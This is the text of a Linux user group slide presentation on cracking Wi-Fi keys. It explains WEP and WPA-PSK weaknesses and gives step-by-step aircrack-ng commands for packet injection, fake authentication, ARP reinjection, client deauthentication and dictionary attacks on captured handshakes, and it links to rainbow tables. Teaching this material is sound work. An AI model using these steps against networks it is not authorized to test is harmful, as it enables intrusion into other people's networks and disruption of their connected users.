Cracking Wireless

Ryan Curtin
LUG@GT

Ryan Curtin

Cracking Wireless - p. 1

Goals
Goals
Setting Up

By the end of this presentation (if you stay awake), you will:

Checking Injection

Understand the different types of wireless keys as well as

their advantages and disadvantages

Understand the legal ramifications of cracking wireless keys

Have a basic idea of the theory behind the cracking of each

key type

Know how to use software to crack wireless keys

WEP
WPA
Questions and Comments?

Ryan Curtin

Cracking Wireless - p. 2

Setting Up
Goals
Setting Up
Checking Injection
WEP
WPA
Questions and Comments?

Most of the work can be done with the aircrack-ng package.

None of these attacks can be performed if you are using
ndiswrapper for your network drivers, or other drivers that do
not support promiscuous (or monitor) mode.
Starting / stopping promiscuous mode:
airmon-ng stop wlan0
airmon-ng check wlan0
airmon-ng start wlan0 <channel>

Ryan Curtin

Cracking Wireless - p. 3

Checking Injection
Goals
Setting Up
Checking Injection

Before starting, make sure your card can inject packets into an
AP!

WEP

aireplay-ng -9 -e <ESSID> -a <MAC> wlan0

WPA
Questions and Comments?

Ryan Curtin

Make sure the percentage of ping replies is not incredibly

small, otherwise it may be difficult to collect data.

Cracking Wireless - p. 4

WEP Encryption
Goals
Setting Up
Checking Injection

The slide title is not redundant! WEP stands for wired

equivalent privacy, not wireless encryption protocol.

WEP
WEP Encryption

64-bit or 128-bit keys

Uses RC4 stream cipher with CRC-32 checksum

Keys have 24-bit IV (initialization vector)

22 4 (16 million) possible IVs

50% probability of repeated IV after only 5000 packets

Cracking WEP
Using aircrack-ng
Using aircrack-ng (2)
WPA
Questions and Comments?

Ryan Curtin

Cracking Wireless - p. 5

Cracking WEP
Goals
Setting Up

Different methods have been developed:

Checking Injection

2001: Fluhrer, Mantin, and Shamir publish WEP flaws and a

passive attack

2005: FBI demonstrates WEP cracking in three minutes

2006: Bittau, Handley, and Lackey show that active attacks

are possible

2007: Pychine, Tews, and Weinmann optimize active attack

(PTW attack)

WEP
WEP Encryption
Cracking WEP
Using aircrack-ng
Using aircrack-ng (2)
WPA
Questions and Comments?

Ryan Curtin

Cracking Wireless - p. 6

Using aircrack-ng
Goals
Setting Up
Checking Injection

1. Gather important data: access point MAC, ESSID, channel

airodump-ng wlan0

WEP
WEP Encryption
Cracking WEP
Using aircrack-ng
Using aircrack-ng (2)
WPA
Questions and Comments?

2. Start capture of IVs

airodump-ng -c <channel> -bssid <MAC> -w
<outputfile> wlan0
Leave this running! You want to capture around 50k IVs
to ensure success (maybe more)
3. Fake authentication with AP
aireplay-ng -1 0 -e <ESSID> -a <MAC>
wlan0

Ryan Curtin

Cracking Wireless - p. 7

Using aircrack-ng (2)

Goals
Setting Up
Checking Injection
WEP
WEP Encryption
Cracking WEP
Using aircrack-ng

4 Reinject ARP packets to get more IVs

aireplay-ng -3 -b <MAC> wlan0
Run until you have a substantial number of IVs (in your
airodump-ng process)

Using aircrack-ng (2)

WPA
Questions and Comments?

Ryan Curtin

5 Crack the key!

FMS attacks (slow): aircrack-ng -f 1 -F
<capture>.cap
PTW attacks (fast!): aircrack-ng -P 2
<capture>.cap

Cracking Wireless - p. 8

WPA Encryption
Goals
Setting Up
Checking Injection

WPA with TKIP appeared as an interim solution to the WEP

problem while 802.11i was prepared; 802.11i is WPA2.

WEP


WPA
WPA Encryption
Cracking WPA-PSK

WPA: Wi-Fi Protected Access

TKIP: Temporal Key Integrity Protocol

Using aircrack-ng
Rainbow Tables

TKIP also uses RC4 cipher (for legacy WEP hardware)

Use AES instead if possible!

IV length increased to 48 bits

WPA-PSK (pre-shared key): common consumer

environment setup

Questions and Comments?

Ryan Curtin

Cracking Wireless - p. 9

Cracking WPA-PSK
Goals
Setting Up

The WPA PSK initialization process is reproducible!

Checking Injection
WEP
WPA
WPA Encryption
Cracking WPA-PSK

Therefore, we must capture a WPA handshake and then try to

replicate it.

Using aircrack-ng
Rainbow Tables
Questions and Comments?

Ryan Curtin

Cracking Wireless - p. 10

Using aircrack-ng
Goals
Setting Up
Checking Injection
WEP

1. Gather important data: access point MAC, ESSID, channel;

optional: ESSID of connected client
airodump-ng wlan0

WPA
WPA Encryption
Cracking WPA-PSK
Using aircrack-ng
Rainbow Tables
Questions and Comments?

2. Start capture of handshakes

airodump-ng -c <channel> -bssid <MAC> -w
<outputfile> wlan0
Leave this running! Watch for WPA handshake:
xx:xx:xx:xx:xx:xx
3. (Optional) Fake deauthentication of client to trigger
handshake
aireplay-ng -0 1 -a <AP MAC> -c <client
MAC> wlan0
Watch for successful ACK in program output

Ryan Curtin

4. Brute-force attack saved handshake

aircrack-ng -w <dictionary> -b <MAC>
<output capture>

Cracking Wireless - p. 11

Rainbow Tables
Goals
Setting Up
Checking Injection
WEP
WPA
WPA Encryption
Cracking WPA-PSK

Rainbow Tables: a giant collection of potential common

passphrases
Available from:


Church of Wifi Rainbow Tables:

http://www.renderlab.net/projects/WPA-tables/

The Schmoo Group: http://rainbowtables.shmoo.com/

Google Search:
http://www.google.com/#q=wpa+rainbow+tables

Using aircrack-ng
Rainbow Tables
Questions and Comments?

Ryan Curtin

Cracking Wireless - p. 12

Questions and Comments?

Goals
Setting Up
Checking Injection
WEP
WPA
Questions and Comments?
Questions and Comments?

Ryan Curtin

Cracking Wireless - p. 13